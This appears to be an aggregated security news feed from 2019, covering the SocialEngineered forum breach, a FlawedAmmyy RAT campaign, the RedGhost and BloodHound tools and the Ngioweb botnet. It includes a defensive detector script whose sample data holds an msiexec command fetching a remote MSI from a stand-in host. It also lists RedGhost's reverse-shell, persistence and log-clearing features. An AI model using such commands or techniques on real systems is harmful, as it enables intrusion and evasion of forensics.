“Mybb had a vulnerability yet again and the site got breached along with other websites using Mybb. We moved over to xenforo, I suggest changing your passwords immediately.” said the owner of the SocialEngineered.net forum.

The owner of the SocialEngineered forum decided to move to the XenForo forum platform after the incident. The administrator urges members to change their login passwords.

In June, experts at RIPS Tech discovered security flaws (a stored cross-site scripting (XSS) issue and a file write issue) in MyBB prior to version 1.8.21 that could allow attackers to take over any board by sending a malicious private message to an administrator or by creating a malicious post.

MyBB has already released a patched version, but evidently, administrators are slow in updating their websites.

On June 13, the attacker leaked data on a hacker forum claiming that he had “uploaded the full database and root directory of this website.”

SocialEngineered forum leak post

The dump includes data of 55,121 forum users, compromised info includes usernames, passwords stored as salted MD5 hashes, email addresses, IP addresses, and private messages.

A post published on a rival forum also revealed that the dump includes the source code of the website, along with data and logs.

The HaveIBeenPwned website added the leaked data to its system; the data set includes 89,000 unique email addresses from 55,000 forum users.

“In June 2019, the “Art of Human Hacking” site Social Engineered suffered a data breach. The breach of the XenForo forum was published on a rival hacking forum and included 89k unique email addresses spread across 55k forum users and other tables in the database. The exposed data also included usernames, IP addresses, private messages and passwords stored as salted MD5 hashes.” states HaveIBeenPwned.

Breach date: 13 June 2019
Date added to HIBP: 23 June 2019
Compromised accounts: 89,392
Compromised data: Email addresses, IP addresses, Passwords, Private messages, Usernames

Pierluigi Paganini

(SecurityAffairs – SocialEngineered forum, hacking)

The post SocialEngineered forum hacked and data leaked online appeared first on Security Affairs.

Microsoft warns of attacks delivering FlawedAmmyy RAT directly in memory

Researchers at Microsoft uncovered a malicious campaign that delivers the infamous FlawedAmmyy RAT directly in memory.

Experts at Microsoft uncovered a malicious campaign that delivers the FlawedAmmyy RAT directly in memory.

The FlawedAmmyy backdoor borrows the code of the Ammyy Admin remote access tool and allows attackers to gain full access to a victim’s machine. The FlawedAmmyy RAT allows stealing sensitive data from infected systems and exfiltrating files.

FlawedAmmyy Remote Access Trojan was involved in attacks carried out by the threat actors tracked as TA505.

Microsoft observed weaponized spam messages using .xls attachments with content in Korean. The macro included in the documents executes the legitimate msiexec.exe tool that downloads an MSI archive.

The MSI archive includes a digitally signed executable that, once run, decrypts and executes another executable in memory.
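The first two links of the chain just described (an Office macro launching the legitimate `msiexec.exe` to fetch a remote MSI) are visible in ordinary process-creation telemetry. The detection logic below is an added example, not Microsoft's rule or code: it scores each event on whether `msiexec.exe` was spawned by an Office application, whether its command line carries an HTTP(S) URL, and whether it was run quietly. The event records, paths, host name and URL are constructed for the demonstration; the field names (`parent`, `image`, `cmdline`) are an assumed normalized schema, not any product's format.

```python
import re
from typing import Dict, List, Tuple

# Office processes that should essentially never be the parent of an installer.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
QUIET_RE = re.compile(r"(^|\s)/q(n|b|r|f)?(\s|$)", re.IGNORECASE)


def basename(path: str) -> str:
    """Case-insensitive file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the list of indicators matched by one process-creation event."""
    if basename(event["image"]) != "msiexec.exe":
        return []
    reasons = []
    if basename(event["parent"]) in OFFICE_PARENTS:
        reasons.append("office-parent")
    if URL_RE.search(event["cmdline"]):
        reasons.append("remote-msi")
    if QUIET_RE.search(event["cmdline"]):
        reasons.append("quiet-install")
    return reasons


def detect(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Alert on msiexec launched from Office, or on msiexec pulling an MSI over HTTP(S).
    A plain quiet install on its own is normal administration and is not alerted."""
    alerts = []
    for ev in events:
        reasons = evaluate(ev)
        if "office-parent" in reasons or "remote-msi" in reasons:
            alerts.append((ev["id"], reasons))
    return alerts


# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    {"id": "evt-1", "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i http://update.example.invalid/pkg.msi /q"},
    {"id": "evt-2", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\admin\Downloads\7zip.msi" /qn'},
    {"id": "evt-3", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"C:\Windows\system32\msiexec.exe /V"},
    {"id": "evt-4", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\user\AppData\Local\Temp\inv.msi"},
    {"id": "evt-5", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe report.txt"},
]

if __name__ == "__main__":
    for event_id, reasons in detect(SAMPLE_EVENTS):
        print(event_id, ", ".join(reasons))
```

Running it on the constructed events alerts on evt-1 (Office parent plus remote MSI, quiet) and evt-4 (Office parent with a local MSI), and stays silent on the administrator's quiet local install and the Windows Installer service's own `msiexec /V`. Because the downloaded executables in this campaign were validly signed, a signature check alone would not have caught the later stages; the parent-child relationship is the cheaper and more durable signal.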

Anomaly detection helped us uncover a new campaign that employs a complex infection chain to download and run the notorious FlawedAmmyy RAT directly in memory. The attack starts with an email and .xls attachment with content in the Korean language. pic.twitter.com/PQ2g7rvDQm

— Microsoft Security Intelligence (@MsftSecIntel) June 21, 2019

This executable then downloads and decrypts another file, wsus.exe, which was also digitally signed on June 19. wsus.exe decrypts and runs the final payload directly in memory. The final payload is the remote access Trojan FlawedAmmyy.

— Microsoft Security Intelligence (@MsftSecIntel) June 21, 2019

“This executable then downloads and decrypts another file, wsus.exe, which was also digitally signed on June 19. wsus.exe decrypts and runs the final payload directly in memory. The final payload is the remote access Trojan FlawedAmmyy,” reads a Tweet published by Microsoft Security Intelligence.

One of the samples involved in this campaign, detected on June 22, was digitally signed using a certificate issued by Thawte for Dream Body Limited.

2019-06-22: 📺#FlawedAmmyy #RAT 👾🐀 | #Signed
Digital Cert 🔏-> [Dream Body Limited] #Thawte
C2: 169.239.128. 185
h/t @malwrhunterteam
🔦Recompiled AmmyAdmin v3🤔
Seems every day they leverage new malware signing 📈certs for campaigns in🇰🇷
MD5: fb5a09e073324e99b979831a98b120b0 pic.twitter.com/oYT96blamA

— Vitali Kremez (@VK_Intel) June 22, 2019
FlawedAmmyy RAT

In May, experts at Yoroi-Cybaze Z-Lab observed a spike in the number of attacks against the banking sector and spotted a new email stealer used by the TA505 hacker group.

Earlier in June, researchers at Trend Micro observed the TA505 group carrying out attacks, involving the FlawedAmmyy RAT and other RATs, against users in Latin America and Asia.

Pierluigi Paganini

(SecurityAffairs – FlawedAmmyy, malware)

The post Microsoft warns of attacks delivering FlawedAmmyy RAT directly in memory appeared first on Security Affairs.

Before yesterday

RedGhost - Linux Post Exploitation Framework Designed To Gain Persistence And Reconnaissance And Leave No Trace

By: Zion3R

Linux post exploitation framework designed to assist red teams in gaining persistence, reconnaissance and leaving no trace.
  • Payloads: function to generate various encoded reverse shells in netcat, bash, python, php, ruby, perl
  • Crontab: function to create a cron job that downloads and runs the payload every minute for persistence
  • Clearlogs: function to clear logs and make forensic investigation difficult
  • MassInfoGrab: function to grab mass information on the system
  • BanIp: function to ban an IP


BloodHound – Hacking Active Directory Trust Relationships

By: Darknet

BloodHound is for hacking active directory trust relationships and it uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment.

Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use it to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment.

Read the rest of BloodHound – Hacking Active Directory Trust Relationships now! Only available at Darknet.

Free proxy service runs on top of Linux Ngioweb Botnet

Researchers from Netlab discovered a website offering free and commercial proxy servers that leverages a huge botnet (Ngioweb) of hacked WordPress sites.

Researchers from Netlab discovered that the Free-Socks.in proxy service is leveraging a huge botnet of hacked WordPress sites.

According to the experts, traffic managed by the proxy service is routed through a network of hacked WordPress sites.

Threat actors compromised the WordPress sites with heavily obfuscated web shells and the Linux.Ngioweb malware, which implements the proxy agent.

The variant analyzed by the researchers is a Linux port of the Win32.Ngioweb malware that was first detected in the wild in August 2018 by experts at Check Point.

“We determined that this is a Proxy Botnet, and it is a Linux version variant of the Win32.Ngioweb malware. We named it Linux.Ngioweb. It shares a lot of code with Win32.Ngioweb, except that it has DGA features.” reads the analysis of Netlab.

“In addition, we have observed that Linux.Ngioweb malware has been implanted into a large number of WordPress Web servers.”

The experts registered one of the DGA C2 domain names (enutofishpronadimofulmultihitision[.]org) in order to analyze the traffic generated by the bot.

The Linux.Ngioweb Bot sample implements Back-Connect Proxy on the victim’s machine.

“The attacker builds multiple Bots into a Proxies Pool and controls it through a two-tier C2 protocol, then provides a Rotating Proxy Service.” continues the analysis.

Ngioweb Linux

The first stage (Stage-1) manages all the infected sites, while the second (Stage-2) provides the C&C servers. In Stage 2, the bot establishes communication with the Stage-2 C2 and enables the Back-Connect Proxy function. The Stage-2 Command and Control servers are specified by the CONNECT command.

By sinkholing the C2 domain, the experts observed connections from 2,692 compromised WordPress sites, most of which are located in the US.

Netlab plans to share the list of infected servers with other security firms and law enforcement agencies.

Relevant security and law enforcement agencies are welcomed to contact netlab[at]360.cn for a list of infected IP addresses.

“Readers are always welcomed to reach us on twitter, WeChat 360Netlab or email to netlab at 360 dot cn.” concludes the report.

Pierluigi Paganini

(SecurityAffairs – Ngioweb, hacking)

The post Free proxy service runs on top of Linux Ngioweb Botnet appeared first on Security Affairs.

Ransomware analysis with Volatility

Introduction In this article, we’ll discuss the Volatility framework and how to perform analysis on ransomware using it. We’ll discuss various capabilities of the tool that can allow us to perform forensic analysis. For this article, we’ll be analyzing two notorious forms of malware, WannaCry and Jigsaw. The malware handled in this article will be […]

The post Ransomware analysis with Volatility appeared first on Infosec Resources.


Ransomware analysis with Volatility was first posted on June 24, 2019 at 8:02 am.

CyberSeek Cybersecurity Career Pathway: Cybersecurity manager/admin

Introduction Cybersecurity managers are advanced-level IT professionals who have worked their way up through the ranks to take on responsibilities in leadership and management. Typically, they have boots-on-the-ground experience with security risk assessment and remediation, computer forensics, incident response and network security; with all this experience and more, they’ve reached a point in their career […]

The post CyberSeek Cybersecurity Career Pathway: Cybersecurity manager/admin appeared first on Infosec Resources.


CyberSeek Cybersecurity Career Pathway: Cybersecurity manager/admin was first posted on June 24, 2019 at 8:01 am.